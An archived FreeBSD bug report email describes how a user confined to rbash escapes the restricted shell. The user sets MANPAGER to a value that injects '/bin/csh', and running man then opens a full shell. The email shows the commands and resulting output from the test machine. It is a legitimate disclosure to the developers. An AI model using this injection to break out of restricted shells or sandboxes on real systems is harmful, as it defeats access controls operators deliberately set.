Date: Fri, 05 Feb 2016 08:51:00 +0000 From: bugzilla-noreply@freebsd.org To: freebsd-bugs@FreeBSD.org Subject: [Bug 206946] possibility to escape restricted shell using custom MANPAGER variable when user has access to man(1) Message-ID: <bug-206946-8@https.bugs.freebsd.org/bugzilla/>
next in thread | raw e-mail | index | archive | help
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=3D206946 Bug ID: 206946 Summary: possibility to escape restricted shell using custom MANPAGER variable when user has access to man(1) Product: Base System Version: 10.2-RELEASE Hardware: Any OS: Any Status: New Severity: Affects Many People Priority: --- Component: bin Assignee: freebsd-bugs@FreeBSD.org Reporter: ilavsky.martin@gmail.com OS: FreeBSD 10.2 amd64 (but works on other versions/archs too).=20 User is set as:=20 # pw user show whoo whoo:<passwd hash>/:1002:1002::0:0:User &:/home/whoo:/usr/local/bin/rbash # # pwd; ls -lad . .bash* /home/whoo drwx------ 3 whoo whoo 15 Feb 4 20:55 . -rw------- 1 whoo whoo 1677 Feb 4 23:54 .bash_history -rw-r--r-- 1 root whoo 35 Feb 4 20:56 .bash_profile # # grep PATH .bash_profile PATH=3D"/home/whoo/bin" export PATH # # ls -la /home/whoo/bin/ total 130 drwxr-xr-x 2 root whoo 4 Feb 4 23:43 . drwx------ 3 whoo whoo 15 Feb 4 20:55 .. -r-xr-xr-x 1 root wheel 21082 Feb 4 23:42 man -r-xr-xr-x 1 root wheel 150216 Sep 4 16:07 more # man and more are copied from FreeBSD's /usr/bin.=20 When logged as user `whoo': $ cd / -rbash: cd: restricted $ $ find -rbash: find: command not found $ $ ls -rbash: ls: command not found $ $ unset PATH -rbash: unset: PATH: cannot unset: readonly variable $ But with specially set MANPAGER: $ export MANPAGER=3D"/usr/bin/less ; /bin/csh" $ $ man man /home/whoo/bin/man: head: not found eval: tbl: not found eval: groff: not found whoo@tbsd01:~ %=20 whoo@tbsd01:~ % setenv PATH "/bin:/usr/bin:/sbin:/usr/sbin" whoo@tbsd01:~ % whoo@tbsd01:~ % cd / whoo@tbsd01:/ % ls -la | head -6 total 138 drwxr-xr-x 22 root wheel 28 Jan 15 14:26 . drwxr-xr-x 22 root wheel 28 Jan 15 14:26 .. -rw-r--r-- 2 root wheel 966 Nov 11 2014 .cshrc -rw-r--r-- 2 root wheel 254 Nov 11 2014 .profile -rw------- 1 root wheel 1024 Feb 24 2015 .rnd whoo@tbsd01:/ % whoo@tbsd01:/tmp % ls blob00 conftest79193=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20 install.dMvSoF9f mc-root=20=20=20=20=20=20=20=20=20=20=20=20= =20=20=20=20=20=20=20=20=20=20=20=20 mergemaster.mtree.fDhpjfhQ screens whoo@tbsd01:/tmp % --=20 You are receiving this mail because: You are the assignee for the bug.=
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?bug-206946-8>